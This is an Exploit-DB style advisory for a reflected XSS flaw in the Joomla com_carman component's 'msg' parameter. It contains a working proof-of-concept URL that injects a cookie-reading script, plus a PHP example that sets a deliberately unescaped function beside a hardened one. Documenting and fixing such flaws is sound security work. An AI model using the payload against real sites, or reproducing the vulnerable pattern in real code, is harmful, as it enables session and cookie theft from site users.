Vendor: com_carman
By: Fl0riX
CVSS: 7.5 (HIGH)
CWE: 79 (Cross Site Scripting)
Product Name: com_carman
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_carman Cross Site Scripting Vulnerability

An attacker can exploit this vulnerability by injecting malicious JavaScript code into the 'msg' parameter of the 'index.php' page. This code will be executed in the browser of the victim when they visit the vulnerable page.

Mitigation:

Input validation should be used to prevent malicious characters from being injected.
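The mitigation above, as an added example that is not com_carman's own code: the component's template is not shown on this page, so the function names and the markup are hypothetical. It assumes 'msg' is reflected inside a double-quoted HTML attribute, as the leading `">` in the request on this page suggests, and pairs input validation with output encoding for that context.

```php
<?php
// Added example, not com_carman source. render_msg_* and the <input> markup
// are hypothetical stand-ins for wherever the component reflects 'msg'.

// Vulnerable pattern: the request value is concatenated into an attribute
// unencoded, so a double quote ends the attribute and the rest of the value
// is parsed as markup.
function render_msg_vulnerable(string $msg): string
{
    return '<input type="hidden" name="msg" value="' . $msg . '">';
}

// Hardened pattern: validate the input, then encode for the output context.
function render_msg_hardened(string $msg): string
{
    // Input validation: bound the length (in bytes) and drop ASCII control
    // characters. These byte values never occur inside a multi-byte UTF-8
    // sequence, so a byte-wise pattern is safe here.
    $msg = substr($msg, 0, 200);
    $msg = preg_replace('/[\x00-\x1F\x7F]/', '', $msg) ?? '';

    // Output encoding: ENT_QUOTES encodes both " and ', so the value cannot
    // close the attribute; < > & are encoded as well. ENT_SUBSTITUTE replaces
    // invalid UTF-8 (including a character cut by substr) with U+FFFD instead
    // of returning an empty string.
    $safe = htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return '<input type="hidden" name="msg" value="' . $safe . '">';
}

// Value of the 'msg' parameter from the request shown on this page.
$poc = '"><script>alert(document.cookie)</script>';

// The first line still contains a live <script> element; the second carries
// the same text as inert attribute data (&quot;&gt;&lt;script&gt;...).
echo render_msg_vulnerable($poc), PHP_EOL;
echo render_msg_hardened($poc), PHP_EOL;
```

Validation alone is not sufficient when the field must accept free text, which is why the encoding step is applied at the point of output regardless of what the validator let through.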
Source

Exploit-DB raw data:

< ------------------- header data start ------------------- >

#####################################################################
       Joomla Component com_carman Cross Site Scripting Vulnerability                                          
####################################################################

# author        :Fl0riX
# Greetz          : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r
# Name        : com_carman

# Bug Type       : Cross Site Scripting

# Infection          : Administrator and user cookies can be stolen.

# Bug Fix Advice     : Malicious characters should be filtered.


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>

< -- bug code end of -- >